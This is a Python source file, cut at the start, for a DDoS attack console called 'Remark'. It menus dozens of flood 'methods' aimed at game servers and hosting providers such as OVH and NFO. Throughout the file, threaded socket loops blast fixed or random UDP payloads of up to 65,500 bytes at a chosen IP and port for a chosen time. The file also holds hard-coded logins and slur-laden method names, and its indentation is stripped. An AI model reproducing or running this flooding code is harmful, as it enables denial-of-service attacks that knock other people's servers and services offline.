udprape [IP] [TIME] [PORT] - Raping UDP
ovhamp [IP] [TIME] [PORT] - OVH Amp Flood
ovhnat [IP] [TIME] [PORT] - OVH nat Flood
ovhdown [IP] [TIME] [PORT] - OVH Rape flood
"""
nfo = """
nfonull [IP] [TIME] [PORT] - Slavic Flood
cpukill [IP] [TIME] [PORT] - Cpu Rape Flood
nfodown [IP] [TIME] [PORT] - Nfo downer
nfodrop [IP] [TIME] [PORT] - Nfo Dropper
nforape [IP] [TIME] [PORT] - Nfo Rape
nfokill [IP] [TIME] [PORT] - Nfo Killer
ssdp [IP] [TIME] [PORT] - Amped SSDP
icmprape [IP] [TIME] [PORT] - ICMP Method
mag-7 [IP] [TIME] [PORT] - Custom method
"""
other = """
slav [IP] [TIME] [PORT] - Slavic Flood
cpukill [IP] [TIME] [PORT] - Cpu Rape Flood
fivemkill [IP] [TIME] [PORT] - Fivem Kill
icmprape [IP] [TIME] [PORT] - ICMP Rape
tcprape [IP] [TIME] [PORT] - Raping TCP
nforape [IP] [TIME] [PORT] - Nfo Method
killv1 [IP] [TIME] [PORT] - Custom Method!
killv2 [IP] [TIME] [PORT] - Custom Method!
killv3 [IP] [TIME] [PORT] - Custom Method!
ntp-x [IP] [TIME] [PORT] - Amped NTP
ak47 [IP] [TIME] [PORT] - Private attack
2kdown [IP] [TIME] [PORT] - NBA 2K Flood
"""
bypass="""
psnrape . icmp-echo tcp-amp . purple-syn
sql-lift . marklift hotspot . backend-chew
hydrakiller . cpu-smash orange-syn . dhcp
udprape . udprapev3 x-v-x . rainbow-syn
udprapev2 . udpbypass greeth . Tempest
madara . vip-clap killall . mark-III
killallv2 . killallv3 powerslap . rapecom
Example How To Attack: [96mMETHOD [IP] [TIME] [PORT]
"""
layer4 = """
udp [IP] [TIME] [PORT]
tcp [IP] [TIME] [PORT]
std [IP] [TIME] [PORT]
syn [IP] [TIME] [PORT]
vse [IP] [TIME] [PORT]
ack [IP] [TIME] [PORT]
dns [IP] [TIME] [PORT]
ovh [IP] [TIME] [PORT]
"""
"""
cookie = open(".sinfull_cookie","w+")
fsubs = 0
tpings = 0
pscans = 0
liips = 0
tattacks = 0
uaid = 0
said = 0
running = 0
iaid = 0
haid = 0
aid = 0
attack = True
ldap = True
http = True
atks = 0
def randsender(host, timer, port, punch):
global iaid
global aid
global tattacks
global running
timeout = time.time() + float(timer)
sock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP)
iaid += 1
aid += 1
tattacks += 1
running += 1
while time.time() < timeout and ldap and attack:
sock.sendto(punch, (host, int(port)))
running -= 1
iaid -= 1
aid -= 1
def stdsender(host, port, timer, payload):
global atks
global running
timeout = time.time() + float(timer)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
atks += 1
running += 1
while time.time() < timeout and attack:
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
sock.sendto(payload, (host, int(port)))
atks -= 1
running -= 1
def main():
global fsubs
global tpings
global pscans
global liips
global tattacks
global uaid
global running
global atk
global ldap
global said
global iaid
global haid
global aid
global attack
global dp
while True:
bots = (random.randint(3250,4150))
sys.stdout.write("\x1b]2;Remark. | Devices: [{}] | Spoofed Servers [19] | Server Units [8] | Clients: [18]\x07".format (bots))
sin = input(root@Remark:~# ").lower()
sinput = sin.split(" ")[0]
if sinput == "clear":
os.system ("clear")
print (banner)
main()
if sinput == "other":
os.system ("clear")
print (other)
main()
elif sinput == "raw":
os.system ("clear")
print (raw)
main()
elif sinput == "layer4":
os.system ("clear")
print (layer4)
main()
elif sinput == "method":
os.system ("clear")
print (methods)
main()
elif sinput == "methods":
os.system ("clear")
print (methods)
main()
elif sinput == "bypass":
os.system ("clear")
print (bypass)
main()
elif sinput == "ovh":
os.system ("clear")
print (ovh)
main()
elif sinput == "nfo":
os.system ("clear")
print (nfo)
main()
elif sinput == "":
main()
elif sinput == "exit":
os.system ("clear")
exit()
elif sinput == "std":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x73\x74\x64\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./dns":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovh":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x02\x00\x2f"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./vse":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfonull":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpukill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfodown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfodrop":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nforape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nfokill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ssdp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./mag-7":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhslav":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhkill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhamp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhnat":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhdown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./slav":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpukill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./fivemkill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./tcprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nforape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv1":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ntp-x":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ak47":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./2kdown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./psnrape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./sql-lift":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./hydrakiller":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmp-echo":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpu-smash":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./tcp-amp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./hotspot":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./orange-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./purple-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./backend-chew":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./dhcp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprapev2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./madara":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killallv2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprapev3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udpbypass":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./vip-clap":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killallv3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./x-v-x":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./greeth":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killall":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./powerslap":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./rainbow-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./Tempest":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./mark-iii":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./rapecom":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "stopattacks":
attack = False
while not attack:
if aid == 0:
attack = True
elif sinput == "stop":
attack = False
while not attack:
if aid == 0:
attack = True
else:
main()
try:
users = ["hg", "guests", "me"]
clear = "clear"
os.system (clear)
print (user)
username = getpass.getpass ("[+] Username: ")
if username in users:
user = username
else:
print ("[+] Incorrect, exiting")
exit()
except KeyboardInterrupt:
print ("\nCTRL-C Pressed")
exit()
try:
passwords = ["hg", "gayman", "me"]
print (passw)
password = getpass.getpass ("[+] Password: ")
if user == "hg":
if password == passwords[0]:
print ("[+] Login correct")
cookie.write("DIE")
time.sleep(2)
os.system (clear)
try:
os.system ("clear")
print (banner)
main()
except KeyboardInterrupt:
print ("\n[\033[91mSIN\033[00m] CTRL has been pressed")
main()
else:
print ("[+] Incorrect, exiting")
exit()
if user == "guests":
if password == passwords[1]:
print ("[+] Login correct")
print ("[+] Certain methods will not be available to you")
time.sleep(4)
os.system (clear)
try:
os.system ("clear")
print (banner)
main()
except KeyboardInterrupt:
print ("\n[\033[91mSIN\033[00m] CTRL has been pressed")
main()
else:
print ("[+] Incorrect, exiting")
exit()
except KeyboardInterrupt:
exit()
try:
clear = "clear"
os.system(clear)
main()
except KeyboardInterrupt:
exit()
| [
"noreply@github.com"
] | iShinj1.noreply@github.com |
